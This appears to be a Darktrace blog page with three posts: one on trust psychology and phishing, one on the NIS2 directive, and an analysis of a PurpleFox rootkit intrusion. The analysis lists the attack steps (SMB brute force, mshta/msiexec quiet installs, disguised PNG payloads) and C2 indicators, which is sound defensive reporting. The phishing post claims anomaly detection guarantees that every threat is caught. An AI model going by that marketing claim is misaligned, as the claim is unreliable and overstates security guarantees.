Blog
Leadership éclairé
Email Security and the Psychology of Trust: Why Users Face a Losing Game of “Spot the Fake”







When security teams discuss the possibility of phishing attacks targeting their organization, often the first reaction is to assume it is inevitable because of the users. Users are typically referenced in cyber security conversations as organizations’ greatest weaknesses, cited as the causes of many grave cyber-attacks because they click links, open attachments, or allow multi-factor authentication bypass without verifying the purpose.
While for many, the weakness of the user may feel like a fact rather than a theory, there is significant evidence to suggest that users are psychologically incapable of protecting themselves from exploitation by phishing attacks, with or without regular cyber awareness trainings. The psychology of trust and the nature of human reliance on technology make the preparation of users for the exploitation of that trust in technology very difficult – if not impossible.
This Darktrace long read will highlight principles of psychological and sociological research regarding the nature of trust, elements of the trust that relate to technology, and how the human brain is wired to rely on implicit trust. These principles all point to the outcome that humans cannot be relied upon to identify phishing. Email security driven by machine augmentation, such as AI anomaly detection, is the clearest solution to tackle that challenge.
What is the psychology of trust?
Psychological and sociological theories on trust largely centre around the importance of dependence and a two-party system: the trustor and the trustee. Most research has studied the impacts of trust decisions on interpersonal relationships, and the characteristics which make those relationships more or less likely to succeed. In behavioural terms, the elements most frequently referenced in trust decisions are emotional characteristics such as benevolence, integrity, competence, and predictability.1
Most of the behavioural evaluations of trust decisions survey why someone chooses to trust another person, how they made that decision, and how quickly they arrived at their choice. However, these micro-choices about trust require the context that trust is essential to human survival. Trust decisions are rooted in many of the same survival instincts which require the brain to categorize information and determine possible dangers. More broadly, successful trust relationships are essential in maintaining the fabric of human society, critical to every element of human life.
Trust can be compared to dark matter (Rotenberg, 2018), which is the extensive but often difficult to observe material that binds planets and earthly matter. In the same way, trust is an integral but often a silent component of human life, connecting people and enabling social functioning.2
Defining implicit and routine trust
As briefly mentioned earlier, dependence is an essential element of the trusting relationship. Being able to build a routine of trust, based on the maintenance rather than establishment of trust, becomes implicit within everyday life. For example, speaking to a friend about personal issues and life developments is often a subconscious reaction to the events occurring, rather than an explicit choice to trust said friend each time one has new experiences.
Active and passive levels of cognition are important to recognize in decision-making, such as trust choices. Decision-making is often an active cognitive process requiring a lot of resource from the brain. However, many decisions occur passively, especially if they are not new choices e.g. habits or routines. The brain’s focus turns to immediate tasks while relegating habitual choices to subconscious thought processes, passive cognition. Passive cognition leaves the brain open to impacts from inattentional blindness, wherein the individual may be abstractly aware of the choice but it is not the focus of their thought processes or actively acknowledged as a decision. These levels of cognition are mostly referenced as “attention” within the brain’s cognition and processing.3
This idea is essentially a concept of implicit trust, meaning trust which is occurring as background thought processes rather than active decision-making. This implicit trust extends to multiple areas of human life, including interpersonal relationships, but also habitual choice and lifestyle. When combined with the dependence on people and services, this implicit trust creates a haze of cognition where trust is implied and assumed, rather than actively chosen across a myriad of scenarios.
Trust and technology
As researchers at the University of Cambridge highlight in their research into trust and technology, ‘In a fundamental sense, all technology depends on trust.’ The same implicit trust systems which allow us to navigate social interactions by subconsciously choosing to trust, are also true of interactions with technology. The implied trust in technology and services is perhaps most easily explained by a metaphor.
Most people have a favourite brand of soda. People will routinely purchase that soda and drink it without testing it for chemicals or bacteria and without reading reviews to ensure the companies that produce it have not changed their quality standards. This is a helpful, representative example of routine trust, wherein the trust choice is implicit through habitual action and does not mean the person is actively thinking about the ramifications of continuing to use a product and trust it.
The principle of dependence is especially important in trust and technology discussions, because the modern human is entirely reliant on technology and so has no way to avoid trusting it.5 Specifically important in workplace scenarios, employees are given a mandatory set of technologies, from programs to devices and services, which they must interact with on a daily basis. Over time, the same implicit trust that would form between two people forms between the user and the technology. The key difference between interpersonal trust and technological trust is that deception is often much more difficult to identify.
The implicit trust in workplace technology
To provide a bit of workplace-specific context, organizations rely on technology providers for the operation (and often the security) of their devices. The organizations also rely on the employees (users) to use those technologies within the accepted policies and operational guidelines. The employees rely on the organization to determine which products and services are safe or unsafe.
Within this context, implicit trust is occurring at every layer of the organization and its technological holdings, but often the trust choice is only made annually by a small security team rather than continually evaluated. Systems and programs remain in place for years and are used because “that’s the way it’s always been done. Within that context, the exploitation of that trust by threat actors impersonating or compromising those technologies or services is extremely difficult to identify as a human.
For example, many organizations utilize email communications to promote software updates for employees. Typically, it would consist of email prompting employees to update versions from the vendors directly or from public marketplaces, such as App Store on Mac or Microsoft Store for Windows. If that kind of email were to be impersonated, spoofing an update and including a malicious link or attachment, there would be no reason for the employee to question that email, given the explicit trust enforced through habitual use of that service and program.
Inattentional blindness: How the brain ignores change
Users are psychologically predisposed to trust routinely used technologies and services, with most of those trust choices continuing subconsciously. Changes to these technologies would often be subject to inattentional blindness, a psychological phenomenon wherein the brain either overwrites sensory information with what the brain expects to see rather than what is actually perceived.
A great example of inattentional blindness6 is the following experiment, which asks individuals to count the number of times a ball is passed between multiple people. While that is occurring, something else is going on in the background, which, statistically, those tested will not see. The shocking part of this experiment comes after, when the researcher reveals that the event occurring in the background not seen by participants was a person in a gorilla suit moving back and forth between the group. This highlights how significant details can be overlooked by the brain and “overwritten” with other sensory information. When applied to technology, inattentional blindness and implicit trust makes spotting changes in behaviour, or indicators that a trusted technology or service has been compromised, nearly impossible for most humans to detect.
With all this in mind, how can you prepare users to correctly anticipate or identify a violation of that trust when their brains subconsciously make trust decisions and unintentionally ignore cues to suggest a change in behaviour? The short answer is, it’s difficult, if not impossible.
How threats exploit our implicit trust in technology
Most cyber threats are built around the idea of exploiting the implicit trust humans place in technology. Whether it’s techniques like “living off the land”, wherein programs normally associated with expected activities are leveraged to execute an attack, or through more overt psychological manipulation like phishing campaigns or scams, many cyber threats are predicated on the exploitation of human trust, rather than simply avoiding technological safeguards and building backdoors into programs.
In the case of phishing, it is easy to identify the attempts to leverage the trust of users in technology and services. The most common example of this would be spoofing, which is one of the most common tactics observed by Darktrace/Email. Spoofing is mimicking a trusted user or service, and can be accomplished through a variety of mechanisms, be it the creation of a fake domain meant to mirror a trusted link type, or the creation of an email account which appears to be a Human Resources, Internal Technology or Security service.
In the case of a falsified internal service, often dubbed a “Fake Support Spoof”, the user is exploited by following instructions from an accepted organizational authority figure and service provider, whose actions should normally be adhered to. These cases are often difficult to spot when studying the sender’s address or text of the email alone, but are made even more difficult to detect if an account from one of those services is compromised and the sender’s address is legitimate and expected for correspondence. Especially given the context of implicit trust, detecting deception in these cases would be extremely difficult.
How email security solutions can solve the problem of implicit trust
How can an organization prepare for this exploitation? How can it mitigate threats which are designed to exploit implicit trust? The answer is by using email security solutions that leverage behavioural analysis via anomaly detection, rather than traditional email gateways.
Expecting humans to identify the exploitation of their own trust is a high-risk low-reward endeavour, especially when it takes different forms, affects different users or portions of the organization differently, and doesn’t always have obvious red flags to identify it as suspicious. Cue email security using anomaly detection as the key answer to this evolving problem.
Anomaly detection enabled by machine learning and artificial intelligence (AI) removes the inattentional blindness that plagues human users and security teams and enables the identification of departures from the norm, even those designed to mimic expected activity. Using anomaly detection mitigates multiple human cognitive biases which might prevent teams from identifying evolving threats, and also guarantees that all malicious behaviour will be detected. Of course, anomaly detection means that security teams may be alerted to benign anomalous activity, but still guarantees that no threat, no matter how novel or cleverly packaged, won’t be identified and raised to the human security team.
Utilizing machine learning, especially unsupervised machine learning, mimics the benefits of human decision making and enables the identification of patterns and categorization of information without the framing and biases which allow trust to be leveraged and exploited.
For example, say a cleverly written email is sent from an address which appears to be a Microsoft affiliate, suggesting to the user that they need to patch their software due to the discovery of a new vulnerability. The sender’s address appears legitimate and there are news stories circulating on major media providers that a new Microsoft vulnerability is causing organizations a lot of problems. The link, if clicked, forwards the user to a login page to verify their Microsoft credentials before downloading the new version of the software. After logging in, the program is available for download, and only requires a few minutes to install. Whether this email was created by a service like ChatGPT (generative AI) or written by a person, if acted upon it would give the threat actor(s) access to the user’s credential and password as well as activate malware on the device and possibly broader network if the software is downloaded.
If we are relying on users to identify this as unusual, there are a lot of evidence points that enforce their implicit trust in Microsoft services that make them want to comply with the email rather than question it. Comparatively, anomaly detection-driven email security would flag the unusualness of the source, as it would likely not be coming from a Microsoft-owned IP address and the sender would be unusual for the organization, which does not normally receive mail from the sender. The language might indicate solicitation, an attempt to entice the user to act, and the link could be flagged as it contains a hidden redirect or tailored information which the user cannot see, whether it is hidden beneath text like “Click Here” or due to link shortening. All of this information is present and discoverable in the phishing email, but often invisible to human users due to the trust decisions made months or even years ago for known products and services.
AI-driven Email Security: The Way Forward
Email security solutions employing anomaly detection are critical weapons for security teams in the fight to stay ahead of evolving threats and varied kill chains, which are growing more complex year on year. The intertwining nature of technology, coupled with massive social reliance on technology, guarantees that implicit trust will be exploited more and more, giving threat actors a variety of avenues to penetrate an organization. The changing nature of phishing and social engineering made possible by generative AI is just a drop in the ocean of the possible threats organizations face, and most will involve a trusted product or service being leveraged as an access point or attack vector. Anomaly detection and AI-driven email security are the most practical solution for security teams aiming to prevent, detect, and mitigate user and technology targeting using the exploitation of trust.
References
1https://www.kellogg.northwestern.edu/trust-project/videos/waytz-ep-1.aspx
2Rotenberg, K.J. (2018). The Psychology of Trust. Routledge.
3https://www.cognifit.com/gb/attention
4https://www.trusttech.cam.ac.uk/perspectives/technology-humanity-society-democracy/what-trust-technology-conceptual-bases-common
5Tyler, T.R. and Kramer, R.M. (2001). Trust in organizations : frontiers of theory and research. Thousand Oaks U.A.: Sage Publ, pp.39–49.
6https://link.springer.com/article/10.1007/s00426-006-0072-4
Vous aimez ça et en voulez plus ?
More in this series
Blog
Leadership éclairé
The Implications of NIS2 on Cyber Security and AI



The NIS2 Directive requires member states to adopt laws that will improve the cyber resilience of organizations within the EU. It impacts organizations that are “operators of essential services”. Under NIS 1, EU member states could choose what this meant. In an effort to ensure more consistent application, NIS2 has set out its own definition. It eliminates the distinction between operators of essential services and digital service providers from NIS1, instead defining a new list of sectors:
- Energy (electricity, district heating and cooling, gas, oil, hydrogen)
- Transport (air, rail, water, road)
- Banking (credit institutions)
- Financial market infrastructures
- Health (healthcare providers and pharma companies)
- Drinking water (suppliers and distributors)
- Digital infrastructure (DNS, TLD registries, telcos, data center providers, etc.)
- ICT service providers (B2B): MSSPs and managed service providers
- Public administration (central and regional government institutions, as defined per member state)
- Space
- Postal and courier services
- Waste management
- Chemicals
- Food
- Manufacturing of medical devices
- Computers and electronics
- Machinery and equipment
- Motor vehicles, trailers and semi-trailers and other transport equipment
- Digital providers (online market places, online search engines, and social networking service platforms) and research organizations.
With these updates, it becomes harder to try and find industry segments not included within the scope. NIS2 represents legally binding cyber security requirements for a significant region and economy. Standout features that have garnered the most attention include the tight timelines associated with notification requirements. Under NIS 2, in-scope entities must submit an initial report or “early warning” to the competent national authority or computer security incident response team (CSIRT) within 24 hours from when the entity became aware of a significant incident. This is a new development from the first iteration of the Directive, which used more vague language of the need to notify authorities “without undue delay”.
Another aspect gaining attention is oversight and regulation – regulators are going to be empowered with significant investigation and supervision powers including on-site inspections. We cover more on this in our white paper.
The stakes are now higher, with the prospect of fines that are capped at €10 million or 2% of an offending organization’s annual worldwide turnover – whichever is greater. Added to that, the NIS2 Directive includes an explicit obligation to hold members of management bodies personally responsible for breaches of their duties to ensure compliance with NIS2 obligations – and members can be held personally liable.
The risk management measures introduced in the Directive are not altogether surprising – they reflect common best practices. Many organizations (especially those that are newly in scope for NIS2) may have to expand their cyber security capabilities, but there’s nothing controversial or alarming in the required measures. For organizations in this situation, there are various tools, best practices, and frameworks they can leverage. Darktrace in particular provides capabilities in the areas of visibility, incident handling, and reporting that can help.
NIS2 and Cyber AI
The use of AI is not an outright requirement within NIS2 – which may be down to lack of knowledge and expertise in the area, and/or the immaturity of the sector. The clue to this might be in the timing: the provisional agreement on the NIS2 text was reached in May 2022 – six months before ChatGPT and other open-source Generative AI tools propelled broader AI technology into the forefront of public consciousness. If the language were drafted today, it's not far-fetched to imagine AI being mentioned much more prominently and perhaps even becoming a requirement.
NIS2 does, however, very clearly recommend that “member states should encourage the use of any innovative technology, including artificial intelligence”[1]. Another section speaks directly to essential and important entities, saying that they should “evaluate their own cyber security capabilities, and where appropriate, pursue the integration of cyber security enhancing technologies, such as artificial intelligence or machine learning systems…”[2]
One of the recitals states that “member states should adopt policies on the promotion of active cyber protection”. Where active cyber protection is defined as “the prevention, detection, monitoring, analysis and mitigation of network security breaches in an active manner.”[3]
From a Darktrace perspective, our self-learning Cyber AI technology is precisely what enables our technology to deliver active cyber protection – protecting organizations and uplifting security teams at every stage of an incident lifecycle – from proactively hardening defenses before an attack is launched, to real-time threat detection and response, through to recovering quickly back to a state of good health.
The visibility provided by Darktrace is vital to understanding the effectiveness of policies and ensuring policy compliance. NIS2 also covers incident handling and business continuity, which Darktrace HEAL addresses through AI-enabled incident response, readiness reports, simulations, and secure collaborations.
Reporting is integral to NIS2 and organizations can leverage Darktrace’s incident reporting features to present the necessary technical details of an incident and provide a jump start to compiling a full report with business context and impact.
What’s Next for NIS2
We don’t yet know the details for how EU member states will transpose NIS2 into national law – they have until 17th October 2024 to work this out. The Commission also commits to reviewing the functioning of the Directive every three years. Given how much our overall understanding and appreciation for not only the dangers of AI but also its power (perhaps even necessity in the realm of cyber security) is changing, we may see many member states will leverage the recitals’ references to AI in order to make a strong push if not a requirement that essential and important organizations within their jurisdiction leverage AI.
Organizations are starting to prepare now to meet the forthcoming legislation related to NIS2. To see how Darktrace can help, talk to your representative or contact us.
[1] (51) on page 11
[2] (89) on page 17
[3] (57) on page 12

Blog
A l'intérieur du SOC
PurpleFox in a Henhouse: How Darktrace Hunted Down a Persistent and Dynamic Rootkit



Versatile Malware: PurpleFox
As organizations and security teams across the world move to bolster their digital defenses against cyber threats, threats actors, in turn, are forced to adopt more sophisticated tactics, techniques and procedures (TTPs) to circumvent them. Rather than being static and predictable, malware strains are becoming increasingly versatile and therefore elusive to traditional security tools.
One such example is PurpleFox. First observed in 2018, PurpleFox is a combined fileless rootkit and backdoor trojan known to target Windows machines. PurpleFox is known for consistently adapting its functionalities over time, utilizing different infection vectors including known vulnerabilities (CVEs), fake Telegram installers, and phishing. It is also leveraged by other campaigns to deliver ransomware tools, spyware, and cryptocurrency mining malware. It is also widely known for using Microsoft Software Installer (MSI) files masquerading as other file types.
The Evolution of PurpleFox
The Original Strain
First reported in March 2018, PurpleFox was identified to be a trojan that drops itself onto Windows machines using an MSI installation package that alters registry values to replace a legitimate Windows system file [1]. The initial stage of infection relied on the third-party toolkit RIG Exploit Kit (EK). RIG EK is hosted on compromised or malicious websites and is dropped onto the unsuspecting system when they visit browse that site. The built-in Windows installer (MSIEXEC) is leveraged to run the installation package retrieved from the website. This, in turn, drops two files into the Windows directory – namely a malicious dynamic-link library (DLL) that acts as a loader, and the payload of the malware. After infection, PurpleFox is often used to retrieve and deploy other types of malware.
Subsequent Variants
Since its initial discovery, PurpleFox has also been observed leveraging PowerShell to enable fileless infection and additional privilege escalation vulnerabilities to increase the likelihood of successful infection [2]. The PowerShell script had also been reported to be masquerading as a .jpg image file. PowerSploit modules are utilized to gain elevated privileges if the current user lacks administrator privileges. Once obtained, the script proceeds to retrieve and execute a malicious MSI package, also masquerading as an image file. As of 2020, PurpleFox no longer relied on the RIG EK for its delivery phase, instead spreading via the exploitation of the SMB protocol [3]. The malware would leverage the compromised systems as hosts for the PurpleFox payloads to facilitate its spread to other systems. This mode of infection can occur without any user action, akin to a worm.
The current iteration of PurpleFox reportedly uses brute-forcing of vulnerable services, such as SMB, to facilitate its spread over the network and escalate privileges. By scanning internet-facing Windows computers, PurpleFox exploits weak passwords for Windows user accounts through SMB, including administrative credentials to facilitate further privilege escalation.
Darktrace detection of PurpleFox
In July 2023, Darktrace observed an example of a PurpleFox infection on the network of a customer in the healthcare sector. This observation was a slightly different method of downloading the PurpleFox payload. An affected device was observed initiating a series of service control requests using DCE-RPC, instructing the device to make connections to a host of servers to download a malicious .PNG file, later confirmed to be the PurpleFox rootkit. The device was then observed carrying out worm-like activity to other external internet-facing servers, as well as scanning related subnets.
Darktrace DETECT™ was able to successfully identify and track this compromise across the cyber kill chain and ensure the customer was able to take swift remedial action to prevent the attack from escalating further.
While the customer in question did have Darktrace RESPOND™, it was configured in human confirmation mode, meaning any mitigative actions had to be manually applied by the customer’s security team. If RESPOND had been enabled in autonomous response mode at the time of the attack, it would have been able to take swift action against the compromise to contain it at the earliest instance.
Attack Overview

Initial Scanning over SMB
On July 14, 2023, Darktrace detected the affected device scanning other internal devices on the customer’s network via port 445. The numerous connections were consistent with the aforementioned worm-like activity that has been reported from PurpleFox behavior as it appears to be targeting SMB services looking for open or vulnerable channels to exploit.
This initial scanning activity was detected by Darktrace DETECT, specifically through the model breach ‘Device / Suspicious SMB Scanning Activity’. Darktrace’s Cyber AI Analyst™ then launched an autonomous investigation into these internal connections and tied them into one larger-scale network reconnaissance incident, rather than a series of isolated connections.

As Darktrace RESPOND was configured in human confirmation mode, it was unable to autonomously block these internal connections. However, it did suggest blocking connections on port 445, which could have been manually applied by the customer’s security team.

Privilege Escalation
The device successfully logged in via NTLM with the credential, ‘administrator’. Darktrace recognized that the endpoint was external to the customer’s environment, indicating that the affected device was now being used to propagate the malware to other networks. Considering the lack of observed brute-force activity up to this point, the credentials for ‘administrator’ had likely been compromised prior to Darktrace’s deployment on the network, or outside of Darktrace’s purview via a phishing attack.
Exploitation
Darktrace then detected a series of service control requests over DCE-RPC using the credential ‘admin’ to make SVCCTL Create Service W Requests. A script was then observed where the controlled device is instructed to launch mshta.exe, a Windows-native binary designed to execute Microsoft HTML Application (HTA) files. This enables the execution of arbitrary script code, VBScript in this case.


There are a few MSIEXEC flags to note:
- /i : installs or configures a product
- /Q : sets the user interface level. In this case, it is set to ‘No UI’, which is used for “quiet” execution, so no user interaction is required
Evidently, this was an attempt to evade detection by endpoint users as it is surreptitiously installed onto the system. This corresponds to the download of the rootkit that has previously been associated with PurpleFox. At this stage, the infected device continues to be leveraged as an attack device and scans SMB services over external endpoints. The device also appeared to attempt brute-forcing over NTLM using the same ‘administrator’ credential to these endpoints. This activity was identified by Darktrace DETECT which, if enabled in autonomous response mode would have instantly blocked similar outbound connections, thus preventing the spread of PurpleFox.

Installation
On August 9, Darktrace observed the device making initial attempts to download a malicious .PNG file. This was a notable change in tactics from previously reported PurpleFox campaigns which had been observed utilizing .MOE files for their payloads [3]. The .MOE payloads are binary files that are more easily detected and blocked by traditional signatured-based security measures as they are not associated with known software. The ubiquity of .PNG files, especially on the web, make identifying and blacklisting the files significantly more difficult.
The first connection was made with the URI ‘/test.png’. It was noted that the HTTP method here was HEAD, a method similar to GET requests except the server must not return a message-body in the response.
The metainformation contained in the HTTP headers in response to a HEAD request should be identical to the information sent in response to a GET request. This method is often used to test hypertext links for validity and recent modification. This is likely a way of checking if the server hosting the payload is still active. Avoiding connections that could possibly be detected by antivirus solutions can help keep this activity under-the-radar.


The server responds with a status code of 200 before the download begins. The HEAD request could be part of the attacker’s verification that the server is still running, and that the payload is available for download. The ‘/test.png’ HEAD request was sent twice, likely for double confirmation to begin the file transfer.

Subsequent analysis using a Packet Capture (PCAP) tool revealed that this connection used the Windows Installer user agent that has previously been associated with PurpleFox. The device then began to download a payload that was masquerading as a Microsoft Word document. The device was thus able to download the payload twice, from two separate endpoints.
By masquerading as a Microsoft Word file, the threat actor was likely attempting to evade the detection of the endpoint user and traditional security tools by passing off as an innocuous text document. Likewise, using a Windows Installer user agent would enable threat actors to bypass antivirus measures and disguise the malicious installation as legitimate download activity.
Darktrace DETECT identified that these were masqueraded file downloads by correctly identifying the mismatch between the file extension and the true file type. Subsequently, AI Analyst was able to correctly identify the file type and deduced that this download was indicative of the device having been compromised.
In this case, the device attempted to download the payload from several different endpoints, many of which had low antivirus detection rates or open-source intelligence (OSINT) flags, highlighting the need to move beyond traditional signature-base detections.



If Darktrace RESPOND was enabled in autonomous response mode at the time of the attack it would have acted by blocking connections to these suspicious endpoints, thus preventing the download of malicious files. However, as RESPOND was in human confirmation mode, RESPOND actions required manual application by the customer’s security team which unfortunately did not happen, as such the device was able to download the payloads.
Conclusion
The PurpleFox malware is a particularly dynamic strain known to continually evolve over time, utilizing a blend of old and new approaches to achieve its goals which is likely to muddy expectations on its behavior. By frequently employing new methods of attack, malicious actors are able to bypass traditional security tools that rely on signature-based detections and static lists of indicators of compromise (IoCs), necessitating a more sophisticated approach to threat detection.
Darktrace DETECT’s Self-Learning AI enables it to confront adaptable and elusive threats like PurpleFox. By learning and understanding customer networks, it is able to discern normal network behavior and patterns of life, distinguishing expected activity from potential deviations. This anomaly-based approach to threat detection allows Darktrace to detect cyber threats as soon as they emerge.
By combining DETECT with the autonomous response capabilities of RESPOND, Darktrace customers are able to effectively safeguard their digital environments and ensure that emerging threats can be identified and shut down at the earliest stage of the kill chain, regardless of the tactics employed by would-be attackers.
Credit to Piramol Krishnan, Cyber Analyst, Qing Hong Kwa, Senior Cyber Analyst & Deputy Team Lead, Singapore
Appendices
Darktrace Model Detections
- Device / Increased External Connectivity
- Device / Large Number of Connections to New Endpoints
- Device / SMB Session Brute Force (Admin)
- Compliance / External Windows Communications
- Anomalous Connection / New or Uncommon Service Control
- Compromise / Unusual SVCCTL Activity
- Compromise / Rare Domain Pointing to Internal IP
- Anomalous File / Masqueraded File Transfer
RESPOND Models
- Antigena / Network / Significant Anomaly / Antigena Breaches Over Time Block
- Antigena / Network / External Threat / Antigena Suspicious Activity Block
- Antigena / Network / Significant Anomaly / Antigena Significant Anomaly from Client Block
- Antigena / Network / Significant Anomaly / Antigena Enhanced Monitoring from Client Block
- Antigena / Network / External Threat / Antigena Suspicious File Block
- Antigena / Network / External Threat / Antigena File then New Outbound Block
List of IoCs
IoC - Type - Description
/C558B828.Png - URI - URI for Purple Fox Rootkit [4]
5b1de649f2bc4eb08f1d83f7ea052de5b8fe141f - File Hash - SHA1 hash of C558B828.Png file (Malware payload)
190.4.210[.]242 - IP - Purple Fox C2 Servers
218.4.170[.]236 - IP - IP for download of .PNG file (Malware payload)
180.169.1[.]220 - IP - IP for download of .PNG file (Malware payload)
103.94.108[.]114:10837 - IP - IP from Service Control MSIEXEC script to download PNG file (Malware payload)
221.199.171[.]174:16543 - IP - IP from Service Control MSIEXEC script to download PNG file (Malware payload)
61.222.155[.]49:14098 - IP - IP from Service Control MSIEXEC script to download PNG file (Malware payload)
178.128.103[.]246:17880 - IP - IP from Service Control MSIEXEC script to download PNG file (Malware payload)
222.134.99[.]132:12539 - IP - IP from Service Control MSIEXEC script to download PNG file (Malware payload)
164.90.152[.]252:18075 - IP - IP from Service Control MSIEXEC script to download PNG file (Malware payload)
198.199.80[.]121:11490 - IP - IP from Service Control MSIEXEC script to download PNG file (Malware payload)
MITRE ATT&CK Mapping
Tactic - Technique
Reconnaissance - Active Scanning T1595, Active Scanning: Scanning IP Blocks T1595.001, Active Scanning: Vulnerability Scanning T1595.002
Resource Development - Obtain Capabilities: Malware T1588.001
Initial Access, Defense Evasion, Persistence, Privilege Escalation - Valid Accounts: Default Accounts T1078.001
Initial Access - Drive-by Compromise T1189
Defense Evasion - Masquerading T1036
Credential Access - Brute Force T1110
Discovery - Network Service Discovery T1046
Command and Control - Proxy: External Proxy T1090.002
References
- https://blog.360totalsecurity.com/en/purple-fox-trojan-burst-out-globally-and-infected-more-than-30000-users/
- https://www.trendmicro.com/en_us/research/19/i/purple-fox-fileless-malware-with-rookit-component-delivered-by-rig-exploit-kit-now-abuses-powershell.html
- https://www.akamai.com/blog/security/purple-fox-rootkit-now-propagates-as-a-worm
- https://www.foregenix.com/blog/an-overview-on-purple-fox
- https://www.trendmicro.com/en_sg/research/21/j/purplefox-adds-new-backdoor-that-uses-websockets.html